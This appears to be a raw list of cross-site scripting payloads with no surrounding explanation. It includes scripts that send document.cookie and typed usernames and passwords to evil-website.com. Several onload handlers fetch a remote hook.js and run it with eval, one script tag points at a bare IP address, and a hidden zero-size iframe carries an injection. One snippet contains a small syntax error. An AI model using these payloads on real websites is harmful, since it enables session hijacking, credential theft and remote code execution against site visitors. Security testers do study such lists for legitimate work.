<script>alert(document.cookie)</script>
<img src=x onerror=alert(document.cookie)>
<script>
fetch("https://evil-website.com", {
method: "POST",
mode: "no-cors",
body: JSON.stringify({ cookie: document.cookie }),
});
</script>
<input name="username" id="username" />
<input
name="password"
id="password"
type="password"
onchange="if(this.value.length); fetch('https://evil-website.com',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});"
/>
<script src="47.106.10.108"></script>
<body
onload="fetch('http://evil-website.com:3000/hook.js')
.then(response => response.text())
.then(script => eval(script))"
.catch(error => console.error('Error:', error));
>
<body
onload="
fetch('http://evilwebsite:3000/hook.js')
.then(function(response) {
return response.text();
})
.then(function(script) {
eval(script);
})
"
>
<body
onload="
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://evil-website.com:3000/hook.js', true);
xhr.onreadystatechange = function () {
if (xhr.readyState == 4 && xhr.status == 200)
eval(xhr.responseText);
};
xhr.send();
"
>
<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
<iframe
src="https://vulnerable-website.com/?<xss-parameter>=<%3Cbody%20onresize=%22print()%22%3E>"
onload="this.style.width='0'; this.style.height='0'"
></iframe>
